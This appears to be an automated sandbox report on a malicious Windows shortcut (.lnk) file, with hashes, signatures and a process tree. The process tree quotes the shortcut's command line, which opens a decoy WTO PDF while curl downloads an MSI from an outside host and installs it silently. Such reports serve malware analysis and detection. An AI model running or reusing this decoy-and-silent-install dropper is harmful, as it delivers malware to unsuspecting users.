Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03-02-2025 03:24

General

  • Target

    68f47a7e0f69a946019a113635c5b55ec78abb0e8108ac1e285b7568093e4e50.lnk

  • Size

    3KB

  • MD5

    d3689eceb2951bd5a9a62c1aa259b7b9

  • SHA1

    6f9eb37cf0afacbc8211412aedc81c460c6fa4cf

  • SHA256

    68f47a7e0f69a946019a113635c5b55ec78abb0e8108ac1e285b7568093e4e50

  • SHA512

    253130444a06cb9a23577001044c13e4c6fb32d1c5a92e8875b5ff50be009b07f61ce1226c0d1b21fc603e44270e3422990fcb814afd6cdb7422139697f61752

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\68f47a7e0f69a946019a113635c5b55ec78abb0e8108ac1e285b7568093e4e50.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1812
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start msedge https://www.wto.org/english/docs_e/legal_e/27-trips.pdf & curl -sLo C:\Users\Admin\AppData\Local\Temp\5010f4b0-d946-4df7-998c-9d43d2b022ab.msi http://hq-office.us/fork/setup315.msi & C:\Users\Admin\AppData\Local\Temp\5010f4b0-d946-4df7-998c-9d43d2b022ab.msi /qn | Taskkill /f /im cmd.exe
      2⤵
        PID:2608

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2608-46-0x00000000021E0000-0x00000000021E1000-memory.dmp

      Filesize

      4KB

    • memory/2608-54-0x00000000021E0000-0x00000000021E1000-memory.dmp

      Filesize

      4KB